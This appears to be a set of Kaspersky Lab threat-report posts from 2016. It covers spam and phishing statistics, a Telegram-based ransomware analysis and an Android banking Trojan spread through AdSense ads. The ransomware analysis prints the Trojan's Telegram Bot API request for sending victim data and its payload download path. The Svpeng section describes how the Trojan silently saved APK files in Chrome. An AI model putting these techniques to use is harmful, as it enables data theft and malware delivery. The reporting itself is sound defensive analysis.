To confirm receipt of the gift certificate, the user is asked to follow a link in the email which in fact leads to an empty domain with a descriptive name (e.g. “winner of the day”). Then, via the redirect, the user ends up at a newly created site with a banner designed in the style of the brand that supposedly sent out the mailing. The user is notified that the number of certificates is limited and that they have only 90 seconds to click on a link, thereby agreeing to receive the gift. After completing a short survey asking things such as “How often do you use our services?” and “How are you planning to use the certificate?” the user is asked to enter their personal data in a form. And finally the “lucky winner” is redirected to a secure payment page where they have to enter their bank card details and pay a minor fee (in the case we analyzed the sum was 1 krone).

In Q3 2016 Germany (13.21%) remained the country targeted most by malicious mailshots #KLReport

Tweet

According to online reviews, some potential victims of this type of certificate fraud were asked to call a number to participate in a telephone survey rather than an online survey. This type of fraudulent scheme is also quite common: the idea is to keep someone on the paid line for as long as possible until they give up on the promised reward.

Like the offers to participate in the testing of goods, these themed messages were sent out from fake addresses with empty or newly created domains that had nothing to do with the organizations in whose name the cybercriminals were offering the certificates.

Statistics Proportion of spam in email traffic

Percentage of spam in global email traffic, Q2 and Q3 2016

The largest percentage of spam in the third quarter – 61.25% – was registered in September. The average share of spam in global email traffic for Q3 amounted to 59.19%, which was 2 p.p. more than in the previous quarter.

Sources of spam by country

Sources of spam by country, Q3 2016

In Q3 2016, the contribution from India increased considerably – by 4 p.p. – and became the biggest source of spam with a share of 14.02%. Vietnam (11.01%, +1 p.p.) remained in second place. The US fell to third after its share (8.88%) dropped by 1.9 p.p.

As in the previous quarter, fourth and fifth were occupied by China (5.02%) and Mexico (4.22%) respectively, followed by Brazil (4.01%), Germany (3.80%) and Russia (3.55%). Turkey (2.95%) rounded off the TOP 10.

Spam email size

Breakdown of spam emails by size, Q2 and Q3 2016

Traditionally, the most commonly distributed emails are very small – up to 2 KB (55.78%), although the proportion of these emails has been declining throughout the year, and in Q3 dropped by 16 p.p. compared to the previous quarter. Meanwhile, the proportion of emails sized 10-20 KB increased considerably from 10.66% to 21.19%. The other categories saw minimal changes.

Malicious email attachments

Currently, the majority of malicious programs are detected proactively by automatic means, which makes it very difficult to gather statistics on specific malware modifications. So we have decided to turn to the more informative statistics of the TOP 10 malware families to trigger mail antivirus.

TOP 10 malware families

Trojan-Downloader.JS.Agent (9.62%) once again topped the rating of the most popular malware families. Trojan-Downloader.JS.Cryptoload (2.58%) came second. Its share increased by 1.34 p.p. As in the previous quarter, Trojan-Downloader.MSWord.Agent (2.34%) completed the top three.

The popular Trojan-Downloader.VBS.Agent family (1.68%) fell to fourth with a 0.48 p.p. decline. It was followed by Trojan.Win32.Bayrob (0.94%).

TOP 10 malware families in Q3 2016

A number of newcomers made it into the bottom half of this TOP 10. Worm.Win32.WBVB (0.60%) in seventh place includes executable files written in Visual Basic 6 (in both P-code and Native modes) that are not recognized as trusted by KSN. The malware samples of this family are only detected by Mail Anti-Virus. For this type of verdict File Antivirus only detects objects with names that are likely to mislead users, for example, AdobeFlashPlayer, InstallAdobe, etc.

In Q3 2016 India (14.02%) became the biggest source of spam #KLReport

Tweet

Trojan.JS.Agent (0.54%) came eighth. A typical representative of this family is a file with .wsf, .html, .js and other extensions. The malware is used to collect information about the browser, operating system and software whose vulnerabilities can be used. If the desired vulnerable software is found, the script tries to run a malicious script or an application via a specified link.

Yet another newcomer – Trojan-Downloader.MSWord.Cryptoload (0.52%) – occupied ninth place. It is usually a document with a .doc or .docx extension containing a script that can be executed in MS Word (Visual Basic for Applications). The script includes procedures for establishing a connection, downloading, saving and running a file – usually a Trojan cryptor.

Trojan.Win32.Agent (0,51%), which was seventh in the previous quarter, rounded off the TOP 10 in the third quarter.

Countries targeted by malicious mailshots

Distribution of email antivirus verdicts by country, Q3 2016

Germany (13.21%) remained the country targeted most by malicious mailshots, although its share continued to decline – by 1.48 p.p. in Q3. Japan (8.76%), whose share increased by 2.36 p.p., moved up to second. China (8.37%) in third saw its share drop by 5.23 p.p.

In Q3 2016, fourth place was occupied by Russia (5.54%); its contribution increased by 1.14 p.p. from the previous quarter. Italy came fifth with a share of 5.01%. The US remained in seventh (4.15%). Austria (2.54%) rounded off this TOP 10.

Phishing

In Q3 2016, the Anti-Phishing system was triggered 37,515,531 times on the computers of Kaspersky Lab users, which is 5.2 million more than the previous quarter. Overall, 7.75% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q3 2016.

Geography of attacks

China (20.21%) remained the country where the largest percentage of users is affected by phishing attacks. In Q3 2016, the proportion of those attacked increased by 0.01 p.p.

Geography of phishing attacks*, Q3 2016

*Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

The percentage of attacked users in Brazil decreased by 0.4 p.p. and accounted for 18.23%, placing the country second in this rating. UAE added 0.88 p.p. to the previous quarter’s figure and came third with 11.07%. It is followed by Australia (10.48%, -2.29 p.p.) and Saudi Arabia (10.13%, +1.5 p.p.).

TOP 10 countries by percentage of users attacked:

China 20.21% Brazil 18.23% United Arab Emirates 11.07% Australia 10.48% Saudi Arabia 10.13% Algeria 10.07% New Zealand 9.7% Macau 9.67% Palestinian Territory 9.59% South Africa 9.28%

The share of attacked users in Russia amounted to 7.74% in the third quarter. It is followed by Canada (7.16%), the US (6.56%) and the UK (6.42%).

Organizations under attack Rating the categories of organizations attacked by phishers

The rating of attacks by phishers on different categories of organizations is based on detections of Kaspersky Lab’s heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab’s databases. It does not matter how the user attempts to open the page – by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat.

In Q3 of 2016, the share of the ‘Financial organizations’ category (banks, payment systems, online stores) accounted for more than half of all registered attacks. The percentage of the ‘Banks’ category increased by 1.7 p.p. and accounted for 27.13%. The proportion of ‘Online stores’ (12.21%) and ‘Payment systems’ (11.55%) increased by 2.82 p.p. and 0.31 p.p. respectively.

Distribution of organizations affected by phishing attacks by category, Q3 2016

In addition to financial organizations, phishers most often attacked ‘Global Internet portals’ (21.73%), ‘Social networking sites’ (11.54%) and ‘Telephone and Internet service providers’ (4.57%). However, their figures remained almost unchanged from the previous quarter – the change for each category was no more than a single percentage point.

Hot topics this quarter Attacks on users of online banking

The third quarter saw the proportion of attacked users in the ‘Banks’ category increase significantly – by 1.7 p.p. The four banks whose clients were attacked most often are all located in Brazil. For several years in a row this country has ranked among the countries with the highest proportion of users attacked by phishers, and occasionally occupies first place. Naturally, online banking users are priority targets for cybercriminals, since the financial benefits of a successful attack are self-evident.

Links to fake banking pages are mostly spread via email.

Example of a phishing email sent on behalf of a Brazilian bank. The link in the email leads to a fake page that imitates the login page to the user’s banking account

‘Porn virus’ for Facebook users

At the beginning of the previous quarter, Facebook users were subjected to phishing attacks. Almost half a year later, the same scheme was used by fraudsters to attack users in Europe. During the attack, a provocative adult video was used as bait. To view it, the user was directed to a fake page (a page on the xic.graphics domain was especially popular) imitating the popular YouTube video portal.

Example of a user being tagged in a post with the video

This extension requested rights to read all the data in the browser, potentially giving the cybercriminals access to passwords, logins, credit card details and other confidential user information. The extension also distributed more links on Facebook that directed to itself, but which were sent using the victim’s name.

Phisher tricks

Carrying on from the second quarter, we continue to talk about the popular tricks of Internet fraudsters. The objectives are simple – to convince their victims that they are using legitimate resources and to bypass security software filters. It is often the case that the more convincing the page is for the victim, the easier it is to detect with a variety of technologies for combating fraudsters.

Nice domains

We have already described a trick whereby spammers use genuine-looking links in emails to spread phishing content. Fraudsters often resort to this technique regardless of how the phishing page is distributed. They are trying to mislead users, who do actually pay attention to the address in the address bar, but who are not technically savvy enough to see the catch.

The main domain of the organization that is being attacked might be represented, for example, by a 13th-level domain:

Or might simply be used in combination with another relevant word, e.g., secure:

These tricks help deceive potential victims, though they make it much easier to detect phishing attacks using security solutions.

Different languages for different victims

By using information about the IP address of a potential victim, phishers determine the country in which they are located. In the example below, they do so by using the service http://www.geoplugin.net/json.gp?ip=.

Depending on the country that has been identified, the cybercriminals will display pages with vocabulary in the corresponding language.

Examples of files that are used to display a phishing page in a specified language

The example below shows 11 different versions of pages for 32 different locations:

Example of a script used by phishers to display the relevant page depending on the location of the victim

TOP 3 attacked organizations

Fraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections of Kaspersky Lab’s heuristic anti-phishing component are for phishing pages hiding behind the names of fewer than 15 companies.

The TOP 3 organizations attacked most frequently by phishers accounted for 21.96% of all phishing links detected in Q3 2016.

Organization % of detected phishing links Facebook 8.040955 Yahoo! 7.446908 Amazon.com 6.469801

In Q3 2016, Facebook (8.1%, +0.07 p.p.) topped the ranking of organizations used by fraudsters to hide their attacks. Microsoft, the leader in the previous quarter, dropped out of the TOP 3. Second place was occupied by Yahoo! (7.45%), whose contribution increased by 0.38 p.p. Third place went to Amazon, a newcomer to the TOP 3 with 6.47%.

Conclusion

In the third quarter of 2016, the proportion of spam in email traffic increased by 2 p.p. compared to the previous quarter and accounted for 59.19%. The largest percentage of spam – 61.25% – was registered in September. India (14.02%), which was only fourth in the previous quarter, became the biggest source of spam. The top three sources also included Vietnam (11.01%) and the US (8.88%).

The top three countries targeted by malicious mailshots remained unchanged from the previous quarter. Germany (13.21%) came first again, followed by Japan (8.76%) and China (8.37%).

In Q3 2016, Kaspersky Lab products prevented over 37.5 million attempts to enter phishing sites, which is 5.2 million more than the previous quarter. Financial organizations were the main target, with banks the worst affected, accounting for 27.13% of all registered attacks. The most attractive phishing targets in Q3 2016 were clients of four banks located in Brazil.

The first cryptor to exploit Telegram

Tue, 11/08/2016 - 05:52

Earlier this month, we discovered a piece of encryption malware targeting Russian users. One of its peculiarities was that it uses Telegram Messenger’s communication protocol to send a decryption key to the threat actor. To our knowledge, this is the first cryptor to use the Telegram protocol in an encryption malware case.

What is a cryptor?

In general, cryptors can be classified into two groups: those which maintain offline encryption and those which don’t.

There are several reasons why file encryption malware requires an Internet connection. For instance, the threat actors may send an encryption key to the cryptor and receive data from it which they can later use to decrypt the victim’s encrypted files.

Obviously, a special service is required on the threat actor’s side to receive data from the cryptor malware. That service must be protected from third-party researchers, and this creates extra software development costs.

Analyzing the Telegram Trojan

The Telegram Trojan is written in Delphi and is over 3MB in size. After launching, it generates a file encryption key and an infection ID (infection_id).

Then it contacts the threat actors using the publicly available Telegram Bot API and operates as a Telegram bot, using the public API to communicate with its creators.

In order for that to happen, the cybercriminals first create a “Telegram bot”. A unique token from the Telegram servers identifies the newly-created bot and is placed into the Trojan’s body so it can use the Telegram API.

The Trojan then sends a request to the URL https://api.telegram.org/bot<token>/GetMe, where <token> the unique ID of the Telegram bot, created by the cybercriminals, is stored. According to the official API documentation, the method ‘getMe’ helps to check if a bot with the specified token exists and finds out basic information about it. The Trojan does not use the information about the bot that the server returns.

The Trojan sends the next request using the method ‘sendMessage’ which allows the bot to send messages to the chat thread of the specified number. The Trojan then uses the chat number hardwired into its body, and sends an “infection successful” report to its creators:

https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

The Trojan sends the following parameters in the request:

<chat> – number of the chat with the cybercriminal;

<computer_name> – name of the infected computer;

<infection_id> – infection ID;

<key_seed> – number used as a basis to generate the file encryption key.

After sending the information, the Trojan searches the hard drives for files with specific extensions, and encrypts them bytewise, using the simple algorithm of adding each file byte to the key bytes.

File extensions selected for encryption

Depending on its configuration, the Trojan may add the extension ‘.Xcri’ to the encrypted files, or leave the extension unchanged. The Trojan’s sample that we analyzed does not change file extensions. A list of encrypted files is saved to the text file ‘%USERPROFILE%\Desktop\База зашифр файлов.txt’.

After encryption, the Trojan sends the request https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>stop.

In this request, all parameters are the same as in the previous request, but the word ‘stop’ is added at the end.

Then the Trojan downloads the extra module Xhelp.exe (URL: http://***.ru/wp-includes/random_compat/Xhelp.exe) from a compromised site created using WordPress, and launches it. This module, called “Informer” (‘Информатор’ in the original Russian) by the cybercriminals, has a graphical interface and informs the victim about what has happened, and puts forward the ransom demand. The ransom is 5,000 RUB which is accepted via Qiwi or Yandex.Money payment methods.

Screens demonstrated to the victim user

The victim can communicate with the cybercriminals via a dedicated entry field in the “Informer” interface. This feature is also based on sending a Telegram message using the method ‘sendMessage’.

Multiple language mistakes in the ransom texts suggest the grade level of the Trojan’s creators. There is also a final phrase which catches the attention: “Thank you for helping Young Programmers Fund”.

Safeguarding measures

All Kaspersky Lab products detect this threat with the following verdicts:

Trojan-Ransom.Win32.Telecrypt
PDM:Trojan.Win32.Generic

MD5:

3e24d064025ec20d6a8e8bae1d19ecdb – Trojan-Ransom.Win32.Telecrypt.a (the main module)
14d4bc13a12f8243383756de92529d6d – Trojan-Ransom.Win32.Telecrypt.a (the ‘Informer’ module).

If you have fallen victim to this encryption malware, we strongly advise you not to pay the ransom. Instead, contact Kaspersky Lab’s support team and we will help you decrypt your files.

Disassembling a Mobile Trojan Attack

Mon, 11/07/2016 - 05:27

In early August we detected several cases of a banking Trojan being downloaded automatically when users viewed certain news sites on their Android devices. Later it became apparent that this was being caused by advertising messages from the Google AdSense network, and was not restricted to news sites. In fact, any site using AdSense to display adverts could potentially have displayed messages that downloaded the dangerous Trojan-Banker.AndroidOS.Svpeng and automatically saved it to the device’s SD card. This behavior surprised us: typically, the browser warns users about downloading a potentially dangerous file, and offers them a choice of whether or not to save the file. We intercepted traffic coming from the attacked device when this sort of “advert” was displayed, and figured out how the malicious program was downloaded and automatically saved.

Some statistics

First of all, let’s provide some information about the latest versions of Trojan-Banker.AndroidOS.Svpeng. It is limited to Russia and the CIS (more about this later). Below is a graph showing detections of the Trojan’s latest version – Svpeng.q.

And here is the graph for the previous version that was distributed in July 2016, also via AdSense:

As you can see from the graphs, within a two-month period Svpeng was detected on the computers of approximately 318,000 users, with the detection rate peaking at around 37,000 attacked users in one day. The high rates and abrupt changes in the number of detections are easy to explain: Google has been quick to block the ads that the Trojan uses for propagation. However, this is a reactive rather than a proactive approach – the malicious ads were blocked after the Trojan was already on thousands of Android devices. It is also worth noting that there were multiple occasions in the past two months when these ads found their way on to AdSense; similar attacks have been occurring up to the present time, with the most recent attack registered on 12 September 2016.

Now for the juicy part

Let’s look at how the displaying of an ad is related to the automatic download of the APK file containing the Trojan and it being saved to the SD card. Below is the HTTP request that leads to the cybercriminals’ advert being displayed:

In response to this request, the server sends a Javascript script that displays the ad message. However, this script contains a hidden surprise: at the beginning there is some heavily obfuscated code. Let’s look, step by step, at what this code actually does:

  1. Declares the variables necessary for operation and deciphers the payload:
  2. We can see that the APK file was downloaded in the form of an encrypted array of bytes in the script. Now it just needs to be saved to the SD card.

  3. Defines the function that will save the file.
  4. The code checks the availability of functions from various browser engines, and if they are unavailable, defines its own function. The object URL and the element <a> (the latter being an HTML notation for a link) are created in this function. The resulting link is assigned the attribute ‘href’ (where the link leads to), and the malicious program emulates a click on this link. This method is not new; quite possibly the Trojan’s creators borrowed it from here, and only added obfuscation and a restriction: the click simulation is only done on touchscreen devices, which for the most part are smartphones.

  5. Breaks the decrypted APK file into blocks of 1024 bytes.
  6. Sets the handler for a page load event. Handler activation initiates the automatic saving of the APK file to the SD card.

Apart from the extra checks to see if the script runs on the smartphone or not, there is an important check in the code to identify the language used on the device. The attackers only target smartphones with a Russian-language interface – these are typically devices belonging to users in Russia and, to a lesser degree, CIS states.

Where’s the catch?

The method described above only works in Google Chrome for Android. When an APK file is downloaded via a link leading to an external web resource, the browser displays a warning that a potentially dangerous object is being downloaded, and prompts the user to choose whether or not to save the file.

When an APK file is broken down into pieces and handed over to the save function via Blob() class, there is no check for the type of the content being saved, so the browser saves the APK file without notifying the user.

We notified Google about this browser behavior and that it was being exploited to distribute malicious content. At the time of publishing a patch had been released that fixed this problem in Google Chrome and will become available to users the next time the browser is updated.

In all other browsers, this method either does not work, or the user is asked if they want to save the file or not. Kaspersky Lab recommends updating Google Chrome to prevent infection by the malware when viewing sites that use AdSense.

Conclusion

Of course, just downloading the Trojan is not enough for it to work; the user also has to install it. To ensure this, the attackers resort to social engineering. The Trojan may be downloaded with any of the following names:

  • last-browser-update.apk
  • WhatsApp.apk
  • Google_Play.apk
  • 2GIS.apk
  • Viber.apk
  • DrugVokrug.apk
  • Instagram.apk
  • VKontakte.apk
  • minecraftPE.apk
  • Skype.apk
  • Android_3D_Accelerate.apk.
  • SpeedBoosterAndr6.0.apk
  • new-android-browser.apk
  • AndroidHDSpeedUp.apk
  • Android_update_6.apk
  • WEB-HD-VIDEO-Player.apk
  • Asphalt_7_Heat.apk
  • CHEAT.apk
  • Root_Uninstaller.apk
  • Mobogenie.apk
  • Chrome_update.apk
  • Trial_Xtreme.apk
  • Cut_the_Rope_2.apk
  • Установка.apk
  • Temple_Run.apk

These names imitate the names of popular legitimate apps or try to convince users that the downloaded app is important and has to be installed. In the latest versions of Android, installation of apps downloaded from unknown sources is blocked by default, but the cybercriminals are obviously counting on users disabling this setting to install an “important browser update” or a newer version of a popular app that is already on their phone.

So far, those behind Svpeng have limited their attacks to smartphone users in Russia. However, next time they push their “adverts” on AdSense they may well choose to attack users in other countries; we have seen similar cases in the past. After all, what could be more convenient than exploiting the most popular advertising platform to download their malicious creations to hundreds of thousands of mobile devices?

IT threat evolution Q3 2016. Statistics

Thu, 11/03/2016 - 06:59

 Download the full report (PDF)

Statistics

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Q3 figures
  • According to KSN data, Kaspersky Lab solutions detected and repelled 171,802,109 malicious attacks from online resources located in 190 countries all over the world.
  • 45,169,524 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 12,657,673 unique malicious objects: scripts, exploits, executable files, etc.
  • Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 1,198,264 user computers.
  • Crypto ransomware attacks were blocked on 821,865 computers of unique users.
  • Kaspersky Lab’s file antivirus detected a total of 116,469,744 unique malicious and potentially unwanted objects.
  • Kaspersky Lab mobile security products detected:
    • 1,520,931 malicious installation packages;
    • 30,167 mobile banker Trojans (installation packages);
    • 37,150 mobile ransomware Trojans (installation packages).
Mobile threats Q3 events Pokémon GO: popular with users and hackers

One of the most significant events of the third quarter was the release of Pokémon GO. Of course, cybercriminals could not ignore such a popular new product and tried to exploit the game for their own purposes. This was primarily done by adding malicious code to the original app and spreading malicious versions via third-party stores. This method was used, for example, to spread Trojan-Banker.AndroidOS.Tordow, which exploits vulnerabilities in the system to obtain root access to a device. With root access, this Trojan protects itself from being deleted, and it can also steal saved passwords from browsers.

But perhaps the most notable case of Pokémon GO’s popularity being used to infect mobile devices involved fraudsters publishing a guide for the game in the official Google Play store. The app turned out to be an advertising Trojan capable of gaining root access to a device by exploiting vulnerabilities in the system.

We later came across two more modifications of this Trojan, which were added to Google Play under the guise of different apps. According to Google Play data, one of them, imitating an equalizer, was installed between 100,000 and 500,000 times.

Trojan.AndroidOS.Ztorg.ad in the official Google Play store

Interestingly, one of the methods used by the cybercriminals to promote the Trojan was a company that pays users for the installation of advertising apps.

Screenshot of the app that prompts the user to install the Trojan for 5 cents

According to this company’s rules, it doesn’t work with users whose devices have root access. The users may be looking to earn some money, but they end up with an infected device and don’t actually receive any money, because after infection the device gains root access.

Ad with a Trojan

The most popular mobile Trojan in the third quarter of 2016 was Trojan-Banker.AndroidOS.Svpeng.q. During the quarter, the number of users attacked by it grew almost eightfold.

Over 97% of users attacked by Svpeng were located in Russia. The attackers managed to make the Trojan so popular by advertising it via Google AdSense – one of the most popular advertising networks on the Russian Internet. Many popular sites use it to display targeted advertising. Anyone can pay to register their ad on the network, and that was exactly what the attackers did.

Along with the advert, however, they added the AdSense Trojan. When a user visited the page with the advert, Svpeng was downloaded to their device.

Bypassing protection mechanisms in Android 6

In our report for the second quarter of 2016 we mentioned the Trojan-Banker.AndroidOS.Asacub family that can bypass several system controls. Of special note this quarter is the Trojan-Banker.AndroidOS.Gugi family that has learned to bypass the security mechanisms introduced in Android 6 by tricking the user. The Trojan first requests rights to overlay other applications, and then uses those rights to trick the user into giving it privileges to work with text messages and to make calls.

Trojan ransomware in the Google Play store

In the third quarter, we registered the propagation of Trojan-Ransom.AndroidOS.Pletor.d, a mobile ransomware program, via Google Play. The Trojan imitated an app for servicing devices, including deleting unnecessary data, speeding up device performance and even antivirus protection.

Trojan-Ransom.AndroidOS.Pletor.d in Google Play

The Trojan checks which country the device is located in, and if it is not Russia or Ukraine, it requests administrator rights and calls the command server. Earlier versions of this Trojan encrypted user data, but this modification doesn’t possess such functionality. Instead, the Trojan blocks operation of the device by opening a window that covers all other open windows and demanding a ransom to unblock it.

Mobile threat statistics

In Q3 2016, Kaspersky Lab detected 1,520,931 malicious installation packages, which is 2.3 times fewer than in the previous quarter.

Number of detected malicious installation packages (Q4 2015 – Q1 2016)

Distribution of mobile malware by type

Distribution of new mobile malware by type (Q2 2016 and Q3 2016)

In Q3 2016, RiskTool software, or legitimate applications that are potentially dangerous to users, topped the rating of malicious objects detected for mobile devices. Their share continued to grow from 45.1% in Q2 to 55.8% this quarter.

Due to the large number of RiskTool programs and the considerable increase in their overall share of the total flow of detected objects, the proportion of almost all other types of malicious programs decreased, even where the actual number of detected programs increased compared to the previous quarter.

The most affected was Trojan-Ransom – its share decreased from 5.72% to 2.37%. This was caused by a decline in activity by the Trojan-Ransom.AndroidOS.Fusob family (covered in more detail below).

At the same time, we registered a slight growth in the share of Trojan-Bankers – from 1.88% to 1.98%.

TOP 20 mobile malware programs

Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Name % of attacked users* 1 DangerousObject.Multi.Generic 78,46 2 Trojan-Banker.AndroidOS.Svpeng.q 11,45 3 Trojan.AndroidOS.Ztorg.t 8,03 4 Backdoor.AndroidOS.Ztorg.c 7,24 5 Backdoor.AndroidOS.Ztorg.a 6,55 6 Trojan-Dropper.AndroidOS.Agent.dm 4,91 7 Trojan.AndroidOS.Hiddad.v 4,55 8 Trojan.AndroidOS.Agent.gm 4,25 9 Trojan-Dropper.AndroidOS.Agent.cv 3,67 10 Trojan.AndroidOS.Ztorg.aa 3,61 11 Trojan-Banker.AndroidOS.Svpeng.r 3,44 12 Trojan.AndroidOS.Ztorg.pac 3,31 13 Trojan.AndroidOS.Iop.c 3,27 14 Trojan.AndroidOS.Muetan.b 3,17 15 Trojan.AndroidOS.Vdloader.a 3,14 16 Trojan-Dropper.AndroidOS.Triada.s 2,80 17 Trojan.AndroidOS.Muetan.a 2,77 18 Trojan.AndroidOS.Triada.pac 2,75 19 Trojan-Dropper.AndroidOS.Triada.d 2,73 20 Trojan.AndroidOS.Agent.eb 2,63

* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place is occupied by DangerousObject.Multi.Generic (78.46%), the verdict used for malicious programs detected using cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.

In Q3 2016, 17 Trojans that use advertising as their main means of monetization (highlighted in blue in the table) made it into the TOP 20. Their goal is to deliver as many adverts as possible to the user, employing various methods, including the installation of new adware. These Trojans may use superuser privileges to conceal themselves in the system application folder, from which it will be very difficult to delete them.

In Q3 2016, attempted infections by financial #malware were registered at 1.2m users’ computers #KLreport #banking

Tweet

With root access on the device, Trojans can do many different things without the user being aware, such as installing apps from Google Play, including paid apps.

It’s worth noting that the Trojans from the Ztorg family, which occupied four places in the TOP 20, are often distributed via the official Google Play store. Since the end of 2015, we have registered more than 10 such cases (including a fake guide for Pokemon GO). Several times the Trojan notched up over 100,000 installations, and on one occasion it was installed more than 500,000 times.

Trojan.AndroidOS.Ztorg.ad masquerading as a guide for Pokemon GO in Google Play

The ranking also included two representatives of the Trojan-Banker.AndroidOS.Svpeng mobile banker family. As we mentioned above, Svpeng.q became the most popular malware in the third quarter of 2016. This was down to the Trojan being distributed via the AdSense advertising network, which is used by a large number of sites on the Russian segment of the Internet.

The geography of mobile threats

The geography of attempted mobile malware infections in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked ** 1 Bangladesh 35,57 2 Nepal 31.54 3 Iran 31.38 4 China 26.95 5 Pakistan 26.83 6 Indonesia 26.33 7 India 24,35 8 Nigeria 22.88 9 Algeria 21,82 10 The Philippines 21.67

* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

Bangladesh topped the rating, with almost 36% of users there encountering a mobile threat at least once during the quarter. China, which came first in this rating two quarters in a row, dropped to fourth place.

The most popular mobile malware in all the countries of this rating (except China) was the same – advertising Trojans that mostly belonged to the Ztorg, Iop, Hiddad and Triada families. A significant proportion of attacks in China also involved advertising Trojans, but the majority of users there encountered Trojans from the Backdoor.AndroidOS.GinMaster and Backdoor.AndroidOS.Fakengry families.

Russia (12.1%) came 24th in this rating, France (6.7%) 52nd, the US (5.3%) 63rd, Italy (5.1%) 65th, Germany (4.9%) 68th, and the United Kingdom (4.7%) 71st.

The situation in Germany and Italy has improved significantly: in the previous quarter, 8.5% and 6.2% of users in those countries respectively were attacked. This was due to a decline in activity by the Fusob family of mobile ransomware.

The safest countries were Austria (3.3%), Croatia (3.1%) and Japan (1.7%).

Mobile banking Trojans

Over the reporting period, we detected 30,167 installation packages for mobile banking Trojans, which is 1.1 times as many as in Q2.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions
(Q4 2015 – Q3 2016)

Trojan-Banker.AndroidOS.Svpeng became the most popular mobile banking Trojan in Q3 due to its active distribution via the advertising network AdSense. More than half the users that encountered mobile banking Trojans in the third quarter faced Trojan-Banker.AndroidOS.Svpeng.q. It was constantly increasing the rate at which it spread – in September the number of users attacked by the Trojan was almost eight times greater than in June.

The number of unique users attacked by the Trojan-Banker.AndroidOS.Svpeng banking Trojan family
(June-September 2016)

Over 97% of attacked users were in Russia. This family of mobile banking Trojans uses phishing windows to steal credit card data and logins and passwords from online banking accounts. In addition, fraudsters steal money via SMS services, including mobile banking.

Geography of mobile banking threats in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked** 1 Russia 3.12 2 Australia 1.42 3 Ukraine 0.95 4 Uzbekistan 0.60 5 Tajikistan 0.56 6 Kazakhstan 0.51 7 China 0.49 8 Latvia 0.47 9 Russia 0.41 10 Belarus 0.37

* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q3 2016, first place was occupied by Russia (3.12%) where the proportion of users that encountered mobile banker Trojans almost doubled from the previous quarter.

In second place again was Australia (1.42%), where the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher families were the most popular threats.

The most widely distributed mobile banking Trojans in Q3 were representatives of the Svpeng, Faketoken, Regon, Asacub, Gugi and Grapereh families. In particular, the third quarter saw the Trojan-Banker.AndroidOS.Gugi family learn how to bypass protection mechanisms in Android by tricking users.

Mobile Ransomware

In Q3 2016, we detected 37,150 mobile Trojan-Ransomware installation packages.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab
(Q4 2015 – Q3 2016)

The sharp rise in the number of mobile Trojan-Ransomware installation packages in Q1 and Q2 of 2016 was caused by the active proliferation of the Trojan-Ransom.AndroidOS.Fusob family of Trojans. In the first quarter of 2016, this family accounted for 96% of users attacked by mobile ransomware; in Q2 it accounted for 85%. Its share in Q3 was 73%.

Number of users attacked by the Trojan-Ransom.AndroidOS.Fusob family, January-September 2016

The highest number of users attacked by the mobile Trojan-Ransomware family was registered in March 2016. Since then the amount of attacked users has been decreasing, especially in Germany.

Despite this, Trojan-Ransom.AndroidOS.Fusob.h remained the most popular mobile Trojan-Ransomware in the third quarter, accounting for nearly 53% of users attacked by mobile ransomware. Once run, the Trojan requests administrator privileges, collects information about the device, including GPS coordinates and call history, and downloads the data to a malicious server. After that, it may receive a command to block the device.

Geography of mobile Trojan-Ransomware in Q3 2016 (percentage of all users attacked)

TOP 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked)

Country* % of users attacked ** 1 Canada 0.95 2 USA 0.94 3 Kazakhstan 0.71 4 Germany 0.63 5 UK 0.61 6 Mexico 0.58 7 Australia 0.57 8 Spain 0,54 9 Italy 0.53 10 Switzerland 0.51

* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

In all the TOP 10 countries apart from Kazakhstan, the most popular Trojan-Ransom family was Fusob. In the US, the Trojan-Ransom.AndroidOS.Svpeng family was also popular. This Trojan family emerged in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng family. These Trojans demand a ransom of $100-$500 from victims to unblock their devices.

In Q3 2016, #crypto #ransomware attacks were blocked on 821,865 unique computers #KLreport

Tweet

In Kazakhstan, the main threat to users originated from representatives of the Small mobile Trojan-Ransom family. This is a fairly simple ransomware program that blocks the operation of a device by overlaying all the windows with its own and demanding $10 to remove it.

Vulnerable apps exploited by cybercriminals

In Q3 2016, the Neutrino exploit kit departed the cybercriminal market, following in the wake of Angler and Nuclear which also left the market in the previous quarter.

RIG and Magnitude remain active. RIG was especially prominent – it has quickly filled the vacant niche on the exploit kit market.

This is the overall picture for the use of exploits this quarter:

